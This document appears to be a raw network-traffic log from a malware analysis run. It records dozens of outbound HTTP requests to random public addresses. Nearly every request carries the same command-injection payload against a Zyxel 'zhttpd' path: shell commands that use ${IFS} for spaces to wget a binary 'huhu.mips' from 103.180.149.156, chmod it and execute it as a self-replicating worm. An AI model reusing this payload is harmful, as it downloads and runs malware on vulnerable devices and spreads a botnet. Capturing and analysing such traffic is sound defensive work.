                                            Feb 2, 2024 06:21:27.934644938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8265192.168.2.1551166126.82.57.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934678078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8266192.168.2.155602841.64.100.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934717894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8267192.168.2.153645452.235.106.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934767962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8268192.168.2.1540092152.247.180.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934798956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8269192.168.2.154502039.92.143.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934855938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8270192.168.2.154929692.126.151.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934900045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8271192.168.2.1557614205.54.253.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934936047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8272192.168.2.1556972101.113.129.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934989929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8273192.168.2.154710284.46.163.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935020924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8274192.168.2.1537830161.44.184.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935070038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8275192.168.2.1533202157.141.72.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935121059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8276192.168.2.1559724199.216.3.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935125113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8277192.168.2.155040834.191.214.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935174942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8278192.168.2.1538622177.21.100.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935225964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8279192.168.2.1535712164.62.175.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935245037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8280192.168.2.1537110162.125.243.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935273886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8281192.168.2.1533776109.79.105.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935313940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8282192.168.2.1551254164.156.124.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935362101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8283192.168.2.1533922188.251.114.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935436010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8284192.168.2.1536444212.145.175.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935457945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8285192.168.2.156089663.244.116.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935487032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8286192.168.2.1556608180.144.51.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935549974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8287192.168.2.1539338201.105.187.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935580969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8288192.168.2.1550874133.114.93.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935606956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8289192.168.2.154707284.181.243.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935653925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8290192.168.2.1549586135.8.66.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935688019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8291192.168.2.1549118161.197.245.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935744047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8292192.168.2.1547298199.253.100.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935779095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8293192.168.2.1541768104.42.111.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935842037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8294192.168.2.1548294136.20.22.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935877085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8295192.168.2.155698286.110.152.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935918093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8296192.168.2.1543350136.116.170.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.935964108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8297192.168.2.155926662.144.39.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936005116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8298192.168.2.1551820159.101.251.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936055899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8299192.168.2.1539390159.43.165.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936081886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8300192.168.2.1539724138.217.1.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936111927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8301192.168.2.1533090112.128.214.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936165094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8302192.168.2.1534408165.38.102.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936177969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8303192.168.2.1559072177.22.32.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936227083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8304192.168.2.1556748178.161.17.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936286926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8305192.168.2.1542248161.215.61.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936307907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8306192.168.2.1552338179.203.151.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936335087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8307192.168.2.1550898206.254.238.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936367035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8308192.168.2.155436662.4.35.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936405897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8309192.168.2.1558684114.131.104.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936459064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8310192.168.2.1542896151.1.23.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936469078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8311192.168.2.153461623.83.148.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936512947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8312192.168.2.154834080.145.245.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936569929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8313192.168.2.1547154221.244.1.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936599970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8314192.168.2.156033074.116.71.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936657906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8315192.168.2.1540104139.59.144.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936686993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8316192.168.2.1534260124.55.49.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936712980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8317192.168.2.1555028158.77.207.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936736107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8318192.168.2.154600278.217.73.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936781883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8319192.168.2.1553188167.194.64.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936820030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8320192.168.2.154119637.241.180.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936860085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8321192.168.2.156075682.167.45.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936909914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8322192.168.2.1543740112.1.62.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936940908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8323192.168.2.1549352128.107.201.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.936983109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8324192.168.2.1544522102.82.162.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937020063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8325192.168.2.1535562192.153.145.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937061071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8326192.168.2.155810420.78.155.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937082052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8327192.168.2.1547008200.151.16.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937115908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8328192.168.2.155419427.65.77.131443
                                            TimestampBytes transferredDirectionData
